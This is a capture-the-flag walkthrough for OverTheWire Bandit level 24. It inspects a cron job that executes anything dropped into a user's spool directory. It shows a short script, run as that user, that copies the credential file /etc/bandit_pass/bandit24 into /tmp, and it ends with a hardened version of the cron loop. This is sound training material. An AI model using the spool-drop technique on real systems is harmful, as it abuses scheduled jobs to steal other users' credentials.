Bandit - Going to Level 24

2 November 2017

Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed. NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level! NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around...

Getting the information

bandit23@melinda:~$ ls /etc/cron.d/
behemoth4_cleanup      leviathan5_cleanup     natas25_cleanup~  semtex0-ppc
cron-apt               manpage3_resetpw_job   natas26_cleanup   semtex5
cronjob_bandit22       melinda-stats          natas27_cleanup   sysstat
cronjob_bandit23       natas-session-toucher  php5              vortex0
cronjob_bandit24       natas-stats            semtex0-32        vortex20
cronjob_bandit24_root  natas25_cleanup        semtex0-64
bandit23@melinda:~$ cat /etc/cron.d/cronjob_bandit24
/etc/cron.d/cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@melinda:~$ cat /etc/cron.d/cronjob_bandit24_root
/etc/cron.d/cronjob_bandit24_root
* * * * * root /usr/bin/cronjob_bandit24_root.sh &> /dev/null
bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24.sh
/usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 "./$i"
        rm -f "./$i"
    fi
done
bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24_root.sh
cat: /usr/bin/cronjob_bandit24_root.sh: Permission denied

We can see that the script cronjob_bandit24.sh, which cron runs every minute as bandit24, executes every script found in /var/spool/bandit24 and then removes it. So how about we create a script (which will be executed by bandit24) that copies the bandit24 password to /tmp/bckbandit24pwd?

But before that, we create a folder in which we will create the script:

mkdir /tmp/bckBandit
cd /tmp/bckBandit

Here is the script we create; I named it 'b24_script.sh':

/tmp/bckBandit/b24_script.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bckBandit/bandit24

Now we need to change the script permissions so that anyone (bandit24 in particular) can execute it, and the directory permissions so that anyone can write to it:

chmod 777 b24_script.sh
chmod 777 /tmp/bckBandit

From there we would just need to copy the script into /var/spool/bandit24, wait for approximately 1 minute (the job runs every minute), and check in /tmp/bckBandit to see that a file named bandit24 has been created and contains the password to the next level.

However, there is a bug in this level, and this won't work. Note that if you need to know exactly when the script has disappeared (that is, when the cron job has run), you can use the following command, which refreshes an ls listing every 2 seconds:

watch ls /var/spool/bandit24
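What makes this level solvable is that cronjob_bandit24.sh executes, as bandit24, whatever other users drop into its spool directory. As an added example (my code, not the Bandit server's script), here is the same loop once it refuses files it cannot trust: it keeps the original's 60 second timeout and unconditional deletion, but only runs regular files owned by the job's own user that are not group- or world-writable. The function names run_trusted_spool, spool_file_trusted and run_limited are mine, and the spool directory is a parameter instead of the fixed /var/spool/$myname.

```shell
#!/bin/bash
# Hardened variant of the loop in cronjob_bandit24.sh (added example, not
# the Bandit server's script). A spool file is executed only if it is a
# regular file, owned by the user the job runs as, and not writable by
# group or others; anything else is deleted without being run.

# Return 0 if FILE may be executed, 1 otherwise.
spool_file_trusted() {
    local file="$1"
    [ -f "$file" ] || return 1
    [ "$(stat -c %u "$file")" = "$(id -u)" ] || return 1
    # stat -c %a prints the octal mode, e.g. 755 or 1777; the write bit is
    # set in the group (second-to-last) or other (last) digit for 2,3,6,7
    case "$(stat -c %a "$file")" in
        *[2367]?|*[2367]) return 1 ;;
    esac
    return 0
}

# Run a command under the same 60 second SIGKILL timeout as the original,
# falling back to a plain run where coreutils timeout is unavailable.
run_limited() {
    if command -v timeout >/dev/null 2>&1; then
        timeout -s 9 60 "$@"
    else
        "$@"
    fi
}

# Process every entry of SPOOL as the original job does, but through the
# trust check above. Prints RAN or SKIPPED for each entry.
run_trusted_spool() {
    local spool="$1" i
    cd "$spool" || return 1
    for i in * .*; do
        case "$i" in .|..) continue ;; esac
        [ -e "$i" ] || continue   # '*' stays literal when the dir is empty
        if spool_file_trusted "$i"; then
            echo "RAN $i"
            run_limited "./$i" || true
        else
            echo "SKIPPED $i"
        fi
        rm -f "./$i"
    done
}
```

With this check in place, a script made executable with chmod 777 as above is removed without ever running, so the password never reaches /tmp.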